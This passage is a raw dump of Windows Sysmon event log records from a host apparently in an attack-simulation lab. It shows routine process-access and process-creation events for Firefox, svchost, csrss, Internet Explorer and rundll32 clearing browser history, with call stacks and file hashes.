Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.039{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c78|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+305112a|C:\Program Files\Mozilla Firefox\xul.dll+3b001b1|C:\Program Files\Mozilla Firefox\xul.dll+3affd38|C:\Program Files\Mozilla Firefox\xul.dll+12f2e5c|C:\Program Files\Mozilla Firefox\xul.dll+12f26c2|C:\Program Files\Mozilla Firefox\xul.dll+12f19f1 10341000x800000000000000016923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.039{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c51|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+305112a|C:\Program Files\Mozilla Firefox\xul.dll+3b001b1|C:\Program Files\Mozilla Firefox\xul.dll+3affd38|C:\Program Files\Mozilla Firefox\xul.dll+12f2e5c|C:\Program Files\Mozilla Firefox\xul.dll+12f26c2|C:\Program Files\Mozilla Firefox\xul.dll+12f19f1 10341000x800000000000000016922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.039{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+2e63c26|C:\Program Files\Mozilla Firefox\xul.dll+172411e|C:\Program Files\Mozilla Firefox\xul.dll+2df7d26|C:\Program Files\Mozilla Firefox\xul.dll+2df693a|C:\Program Files\Mozilla Firefox\xul.dll+2ec95e7|C:\Program Files\Mozilla Firefox\xul.dll+42b911|C:\Program Files\Mozilla Firefox\xul.dll+14e56f6|C:\Program Files\Mozilla Firefox\xul.dll+3016795|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+30168fa|C:\Program Files\Mozilla Firefox\xul.dll+3018673|C:\Program Files\Mozilla Firefox\xul.dll+2ca7dc|C:\Program Files\Mozilla Firefox\xul.dll+30045c0|C:\Program Files\Mozilla Firefox\xul.dll+3006bed|C:\Program Files\Mozilla Firefox\xul.dll+2cac90|C:\Program Files\Mozilla Firefox\xul.dll+305112a|C:\Program Files\Mozilla Firefox\xul.dll+3b001b1|C:\Program Files\Mozilla Firefox\xul.dll+3affd38|C:\Program Files\Mozilla Firefox\xul.dll+12f2e5c|C:\Program Files\Mozilla Firefox\xul.dll+12f26c2|C:\Program Files\Mozilla Firefox\xul.dll+12f19f1 10341000x800000000000000016921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.037{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000016920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.037{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000016919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:58.989{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+27db2|C:\Windows\SYSTEM32\IEFRAME.dll+457dc7|C:\Windows\SYSTEM32\IEFRAME.dll+457b7e|C:\Windows\SYSTEM32\IEFRAME.dll+1b054e|C:\Windows\SYSTEM32\IEFRAME.dll+131f0|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.856{59A5CD1D-9460-6005-3C05-00000000A301}4772C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:276824072 WinX:0 WinY:0 IEFrame:0000000000000000C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000017144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+27db2|C:\Windows\SYSTEM32\IEFRAME.dll+457dc7|C:\Windows\SYSTEM32\IEFRAME.dll+457b62|C:\Windows\SYSTEM32\IEFRAME.dll+1b054e|C:\Windows\SYSTEM32\IEFRAME.dll+131f0|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.854{59A5CD1D-9460-6005-3B05-00000000A301}4688C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:276824072 WinX:0 WinY:0 IEFrame:0000000000000000C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 10341000x800000000000000017141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:00.848{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 